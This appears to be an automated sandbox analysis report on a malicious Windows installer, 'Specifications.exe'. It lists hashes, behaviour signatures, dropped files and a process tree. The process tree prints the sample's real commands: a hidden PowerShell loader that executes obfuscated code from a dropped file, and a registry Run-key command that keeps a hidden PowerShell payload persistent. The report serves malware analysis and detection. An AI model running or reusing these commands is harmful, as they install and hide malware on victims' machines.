Analysis

  • max time kernel
    145s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17/06/2024, 11:36

General

  • Target

    Specifications.exe

  • Size

    757KB

  • MD5

    1724bf93af4c371ce30369f59b3b43bf

  • SHA1

    555106c85d133a1362904317afdae88e8c8d6b43

  • SHA256

    b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4

  • SHA512

    fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6

  • SSDEEP

    12288:5FRwba0Ugzh4BIUFPefhPh7kwIpur5QF/gtVIhodF8NBQX4A/cORo:KOLgrUFEhPh7kNpDF/goKdyNBNA/c

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 2 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Specifications.exe
    "C:\Users\Admin\AppData\Local\Temp\Specifications.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Skfulds175=Get-Content 'C:\Users\Admin\AppData\Local\hotdoggen\Bulkcarrieren.Hou';$Mesenteronic=$Skfulds175.SubString(54610,3);.$Mesenteronic($Skfulds175)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1996
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2792
        • C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe
          "C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe"
          3⤵
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2516
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:2580

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\hotdoggen\Bulkcarrieren.Hou

      Filesize

      53KB

      MD5

      f9cfb3763d8507c5f1c448cfdbe34957

      SHA1

      eed922ec7b79a7a7cbd9932c9114ebfee0056744

      SHA256

      e9b9d717a2185eef8a258e01429768017d26d6167cb62084c241b9b982fb64d4

      SHA512

      06f9c3e6f24b06e19a0fa3cc5b933934cdf3e62d4f5510ae3bedcc9938837fdcdfcead02fe4de8a89893f7ccd3dd402c1c8456c65319f2562619b9229d16853f

    • C:\Users\Admin\AppData\Local\hotdoggen\Mammonish.Fro

      Filesize

      319KB

      MD5

      ac1b87f114afc3a08241f726d236e294

      SHA1

      3015700d1c89f76664d0a6ac7004f741e41e6d5f

      SHA256

      a9b56415b6be3bea2c53c028197e668348bbff6b6fe2d8ed2f69b811fe8ee759

      SHA512

      b90c4bedcc75a748692326fa89b2b02f797f6b34f3a5a665d552c67b13ce9e55b21fa0587aaeb02ba055b10938e6e45e2e45bf42a64b8af999d46138f92bb27d

    • \Users\Admin\AppData\Local\Temp\immeritoriously.exe

      Filesize

      757KB

      MD5

      1724bf93af4c371ce30369f59b3b43bf

      SHA1

      555106c85d133a1362904317afdae88e8c8d6b43

      SHA256

      b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4

      SHA512

      fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6

    • memory/1996-9-0x0000000073D31000-0x0000000073D32000-memory.dmp

      Filesize

      4KB

    • memory/1996-11-0x0000000073D30000-0x00000000742DB000-memory.dmp

      Filesize

      5.7MB

    • memory/1996-10-0x0000000073D30000-0x00000000742DB000-memory.dmp

      Filesize

      5.7MB

    • memory/1996-12-0x0000000073D30000-0x00000000742DB000-memory.dmp

      Filesize

      5.7MB

    • memory/1996-13-0x0000000073D30000-0x00000000742DB000-memory.dmp

      Filesize

      5.7MB

    • memory/1996-17-0x00000000065D0000-0x0000000008D20000-memory.dmp

      Filesize

      39.3MB

    • memory/1996-23-0x0000000073D30000-0x00000000742DB000-memory.dmp

      Filesize

      5.7MB

    • memory/3036-22-0x0000000000400000-0x0000000001462000-memory.dmp

      Filesize

      16.4MB

    • memory/3036-39-0x0000000000400000-0x0000000001462000-memory.dmp

      Filesize

      16.4MB